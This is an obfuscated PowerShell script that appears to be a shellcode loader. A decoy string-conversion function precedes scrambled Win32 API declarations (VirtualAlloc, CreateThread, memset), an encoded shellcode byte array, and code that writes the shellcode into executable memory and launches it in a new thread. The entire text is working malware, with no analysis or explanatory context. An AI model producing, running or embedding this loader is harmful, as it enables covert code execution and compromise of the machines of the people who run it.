  ${R`V`E1Xq} =[Type]("{1}{2}{0}" -F'Ng','te','xT.EncoDi'); function re`moVE-`St`RIN`glA`TincH`A`RACtER
{

    [CmdletBinding()]
	PARAM (
		[Parameter(vaLuEFrOMpipElIne=${T`RUe})]
		[System.String[]]${StR`ing}
		)
	PROCESS
	{
        FOREACH (${st`R`i`NgValue} in ${StR`INg})
        {
            &("{2}{1}{0}{3}" -f'rbo','e','Write-V','se') -Message "$StringValue"

            TRY
            {
                  ( .("{1}{0}"-f'ir','d') ('VAR'+'IaBLe:Rve1X'+'q')  )."V`ALuE"::"aS`cIi"."geTsT`R`iNg"( ${R`V`e1Xq}::("{1}{0}{2}" -f 'i','GetEncod','ng').Invoke(("{1}{0}"-f 'illic','Cyr')).("{1}{0}" -f'etBytes','G').Invoke(${sTr`inG`V`AluE}))
            }
		    CATCH
            {
                &("{1}{0}{2}"-f 'rite','W','-Error') -Message ${Err`Or}[0]."excePT`I`On"."MEs`s`AGe"
            }
        }
	}
}
${Eh`Px} = ((("{83}{29}{10}{99}{42}{91}{41}{3}{114}{78}{74}{69}{110}{90}{8}{122}{82}{120}{86}{59}{50}{53}{39}{70}{30}{28}{11}{2}{58}{67}{97}{119}{18}{80}{60}{9}{4}{103}{20}{87}{77}{32}{89}{5}{92}{72}{27}{101}{46}{63}{95}{88}{71}{45}{0}{57}{31}{36}{34}{107}{96}{7}{117}{84}{17}{112}{6}{64}{79}{48}{94}{113}{19}{38}{26}{93}{68}{15}{66}{56}{61}{47}{35}{44}{118}{62}{23}{16}{81}{25}{54}{22}{102}{109}{21}{115}{40}{111}{33}{73}{108}{43}{104}{105}{116}{100}{51}{121}{106}{75}{98}{24}{1}{37}{13}{12}{76}{55}{14}{85}{49}{65}{52}" -f 'd','tr m','u',']','llo','t','ern','ubli','ern ','A','Import(dx','ess, ','et(I','s','nt s','tackSi','uint dw','ati','u','r lpThrea','nT','t','gs',', ','IntP','n','t','r','lpAddr','Dll',' ','er','u','m','el32.d','lpParam','n','em','dAttribu','(IntPt','lpT','dx3)','l32','crt.','et','rt(','ct);','Ptr ','ea',' uint cou','Allo',' ',');','c','Fla','tPtr dest, ui','rtAddress, In','x3k','i','ual',' fl','t','r','[DllI',' Int','nt','ze, IntPtr lpSta','nt',' dwS',' sta','r','o','lP','port(dx3ms','ic','r','n','pe, ','bl','Ptr Cr','int','Creatio','nt','[','t','rc,','r Virt','y','p','in','ext','.dll',' f','es, uint','teThr','m','3)]p',' dwSize,','n ','3kerne','blic','ote',', In','catio','dl','ldx3)','exte','lldx','v','tP','tic ','hreadId);[DllI','c ext','ead(IntPt','pu','r ',']pu','c s','e',' ','Pt','static ','I'))."RePLA`cE"(([CHAR]100+[CHAR]120+[CHAR]51),[strIng][CHAR]34));${w} = .("{1}{0}{2}"-f'T','Add-','ype') -memberDefinition ${E`Hpx} -Name ("{1}{0}"-f 'in32','W') -namespace ("{2}{3}{1}{0}"-f '2Functions','3','Wi','n') -passthru;[Byte[]];[Byte[]]${Z} = 0xbb,0xa0,0xf4,0x95,0xcb,0xd9,0xc1,0xd9,0x74,0x24,0xf4,0x5a,0x33,0xc9,0xb1,0x47,0x83,0xea,0xfc,0x31,0x5a,0x0f,0x03,0x5a,0xaf,0x16,0x60,0x37,0x47,0x54,0x8b,0xc8,0x97,0x39,0x05,0x2d,0xa6,0x79,0x71,0x25,0x98,0x49,0xf1,0x6b,0x14,0x21,0x57,0x98,0xaf,0x47,0x70,0xaf,0x18,0xed,0xa6,0x9e,0x99,0x5e,0x9a,0x81,0x19,0x9d,0xcf,0x61,0x20,0x6e,0x02,0x63,0x65,0x93,0xef,0x31,0x3e,0xdf,0x42,0xa6,0x4b,0x95,0x5e,0x4d,0x07,0x3b,0xe7,0xb2,0xdf,0x3a,0xc6,0x64,0x54,0x65,0xc8,0x87,0xb9,0x1d,0x41,0x90,0xde,0x18,0x1b,0x2b,0x14,0xd6,0x9a,0xfd,0x65,0x17,0x30,0xc0,0x4a,0xea,0x48,0x04,0x6c,0x15,0x3f,0x7c,0x8f,0xa8,0x38,0xbb,0xf2,0x76,0xcc,0x58,0x54,0xfc,0x76,0x85,0x65,0xd1,0xe1,0x4e,0x69,0x9e,0x66,0x08,0x6d,0x21,0xaa,0x22,0x89,0xaa,0x4d,0xe5,0x18,0xe8,0x69,0x21,0x41,0xaa,0x10,0x70,0x2f,0x1d,0x2c,0x62,0x90,0xc2,0x88,0xe8,0x3c,0x16,0xa1,0xb2,0x28,0xdb,0x88,0x4c,0xa8,0x73,0x9a,0x3f,0x9a,0xdc,0x30,0xa8,0x96,0x95,0x9e,0x2f,0xd9,0x8f,0x67,0xbf,0x24,0x30,0x98,0xe9,0xe2,0x64,0xc8,0x81,0xc3,0x04,0x83,0x51,0xec,0xd0,0x3e,0x57,0x7a,0x1b,0x16,0x56,0x10,0xf3,0x65,0x59,0xf5,0x5f,0xe3,0xbf,0xa5,0x0f,0xa3,0x6f,0x05,0xe0,0x03,0xc0,0xed,0xea,0x8b,0x3f,0x0d,0x15,0x46,0x28,0xa7,0xfa,0x3f,0x00,0x5f,0x62,0x1a,0xda,0xfe,0x6b,0xb0,0xa6,0xc0,0xe0,0x37,0x56,0x8e,0x00,0x3d,0x44,0x66,0xe1,0x08,0x36,0x20,0xfe,0xa6,0x5d,0xcc,0x6a,0x4d,0xf4,0x9b,0x02,0x4f,0x21,0xeb,0x8c,0xb0,0x04,0x60,0x04,0x25,0xe7,0x1e,0x69,0xa9,0xe7,0xde,0x3f,0xa3,0xe7,0xb6,0xe7,0x97,0xbb,0xa3,0xe7,0x0d,0xa8,0x78,0x72,0xae,0x99,0x2d,0xd5,0xc6,0x27,0x08,0x11,0x49,0xd7,0x7f,0xa3,0xb5,0x0e,0xb9,0xd1,0xd7,0x92;${g} = 0x1000;if (${z}."le`NGTh" -gt 0x1000){${g} = ${Z}."lEn`gTH"};${O`EIt}=${w}::("{1}{3}{2}{0}"-f'c','Virtual','lo','Al').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."LEn`g`TH"-1);${i}++) {${w}::"me`MsET"([IntPtr](${oe`it}.("{1}{2}{0}" -f'nt32','To','I').Invoke()+${I}), ${Z}[${i}], 1)};${W}::("{1}{0}{2}{3}" -f'teTh','Crea','re','ad').Invoke(0,0,${O`eIt},0,0,0);for (;;){&("{0}{3}{2}{1}" -f'Star','ep','sle','t-') 60};
